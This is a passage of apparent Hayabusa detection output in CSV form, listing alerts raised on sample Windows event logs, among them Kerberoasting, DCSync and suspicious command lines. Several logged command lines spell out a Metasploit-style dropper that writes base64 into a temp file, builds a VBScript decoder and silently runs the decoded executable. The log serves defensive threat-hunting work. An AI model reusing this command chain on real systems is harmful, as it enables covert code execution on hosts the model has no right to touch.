AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAA
AAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = 
CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = 
""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory 
Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 